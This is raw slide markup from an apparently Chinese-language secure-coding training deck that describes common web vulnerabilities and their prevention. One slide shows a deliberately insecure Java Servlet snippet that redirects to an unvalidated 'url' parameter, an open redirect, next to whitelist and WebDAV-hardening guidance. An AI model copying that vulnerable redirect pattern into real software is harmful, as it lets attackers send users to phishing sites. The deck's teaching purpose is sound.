            <a:fld id="{8D486EDB-1F4B-46FD-9A29-FEB36E09C7CB}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>6</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="26" name="组合 25"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="307977" y="1700808"/>
            <a:ext cx="4697903" cy="3228746"/>
            <a:chOff x="2477212" y="1642157"/>
            <a:chExt cx="7165552" cy="4304995"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="13" name="图片 12"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="2477212" y="1642157"/>
              <a:ext cx="7165552" cy="4304995"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="任意多边形 23"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4172989" y="2111433"/>
              <a:ext cx="4372495" cy="3042458"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 4372495"/>
                <a:gd name="connsiteY0" fmla="*/ 3042458 h 3042458"/>
                <a:gd name="connsiteX1" fmla="*/ 1064029 w 4372495"/>
                <a:gd name="connsiteY1" fmla="*/ 3009207 h 3042458"/>
                <a:gd name="connsiteX2" fmla="*/ 1064029 w 4372495"/>
                <a:gd name="connsiteY2" fmla="*/ 3009207 h 3042458"/>
                <a:gd name="connsiteX3" fmla="*/ 2177935 w 4372495"/>
                <a:gd name="connsiteY3" fmla="*/ 2693323 h 3042458"/>
                <a:gd name="connsiteX4" fmla="*/ 3275215 w 4372495"/>
                <a:gd name="connsiteY4" fmla="*/ 964276 h 3042458"/>
                <a:gd name="connsiteX5" fmla="*/ 4372495 w 4372495"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 3042458"/>
                <a:gd name="connsiteX6" fmla="*/ 4372495 w 4372495"/>
                <a:gd name="connsiteY6" fmla="*/ 0 h 304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2495" h="3042458">
                  <a:moveTo>
                    <a:pt x="0" y="3042458"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1064029" y="3009207"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1064029" y="3009207"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1249680" y="2956560"/>
                    <a:pt x="1809404" y="3034145"/>
                    <a:pt x="2177935" y="2693323"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2546466" y="2352501"/>
                    <a:pt x="2909455" y="1413163"/>
                    <a:pt x="3275215" y="964276"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3640975" y="515389"/>
                    <a:pt x="4372495" y="0"/>
                    <a:pt x="4372495" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="4372495" y="0"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln w="28575"/>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t" anchorCtr="0" compatLnSpc="1"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="685800" eaLnBrk="0" hangingPunct="0"/>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1350">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="文本框 29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5309171" y="1152024"/>
            <a:ext cx="3475482" cy="4801314"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="214630" indent="-214630">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="u"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>运行阶段</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>运行一段时间后，被白帽子报告或者黑客攻击发现的漏洞，给企业带来相当大的风险和成本压力。再修复需要运维、安全、研发、测试共同介入，修复成本上升。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="214630" indent="-214630">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="u"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>发布阶段</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>发布到线上后检测出的漏洞，需要安全人员给出方案、研发人员沟通、测试人员验证，需要承受一定的上线压力，相对成本较高</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="214630" indent="-214630">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="u"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>测试阶段</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>测试阶段发现的漏洞，由测试提交给研发，需要一定的沟通成本，相对修复效率较高。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="214630" indent="-214630">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="u"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>研发阶段</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>研发阶段发现的漏洞可以由开发直接修复，成本低，效率高</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>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874213" y="4365104"/>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1017883" y="773907"/>
            <a:ext cx="6624637" cy="5601533"/>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重要</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660033"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>及多发</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660033"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>WEB</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660033"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>漏洞成因与</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="660033"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>防范</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密码</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660033"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>明文传输</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验证码可绕过或重复使用</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任意密码登录</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其他常见漏洞</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跨站点请求伪造</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660033"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>CSRF</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数据库访问控制</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="FF6600"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="u"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="660033"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>会话</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660033"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>标识未更新</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="15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URL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660033"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>重定向攻击</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启用不安全的</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660033"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>WebDAV</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660033"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>模块</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="15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批量请求攻击</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="FF6600"/>
              </a:buClr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000"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r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>重定向攻击</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="80899" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="133191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【规范要求】</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>使用白名单校验重定向的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>地址给用户展示安全风险提示，并由用户再次确认是否跳转。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>【释义说明】</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>由于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>站点有时需要根据不同的逻辑将用户引向到不同的页面，如典型的登录接口就经常需要在认证成功之后将用户引导到登录之前的页面，整个过程中如果实现不好就可能导致</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>重定向问题，攻击者构造恶意跳转的链接，可以向用户发起钓鱼攻击。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>重定向攻击</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="80899" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="133191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【代码示例】</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>Servlet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>redirect </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>方式为例，示例代码片段如下</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx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827584" y="2492896"/>
          <a:ext cx="7643813" cy="1463040"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="7643813"/>
              </a:tblGrid>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="x-none" altLang="zh-CN" sz="1800" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>String site = request.getParameter("url");</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1800" b="0" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="x-none" altLang="zh-CN" sz="1800" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>	if(!site.isEmpty()){//</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="zh-CN" sz="1800" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>只是进行了简单的判空操作，未对跳转地址进行相应的校验</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="x-none" altLang="zh-CN" sz="1800" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>		response.sendRedirect(site);</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1800" b="0" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="x-none" altLang="zh-CN" sz="1800" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>	}</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1600" b="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                        <a:ea typeface="+mn-ea"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91439" marR="91439">
                    <a:solidFill>
                      <a:schemeClr val="bg1">
                        <a:lumMod val="85000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>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r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>启用不安全的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>WebDAV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>模块</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="80899" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="323528" y="90872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【规范要求】</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>如确认不需要使用此模块，建议在不影响业务的前提下在服务器端禁用此模块，同时对外网关闭</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>PUT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>DELETE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>MOVE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>等方法。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>在应用程序的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>web.xml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>中添加如下代码</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx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827584" y="2924944"/>
          <a:ext cx="6918251" cy="3291840"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="6918251"/>
              </a:tblGrid>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>&lt;security-constraint&gt;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&lt;web-resource-collection&gt;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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="0" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>url</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>-pattern&gt;/*&lt;/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="0" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>url</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>-pattern&gt;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&lt;http-method&gt;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="0" kern="1200" dirty="0">
                          <a:solidFill>
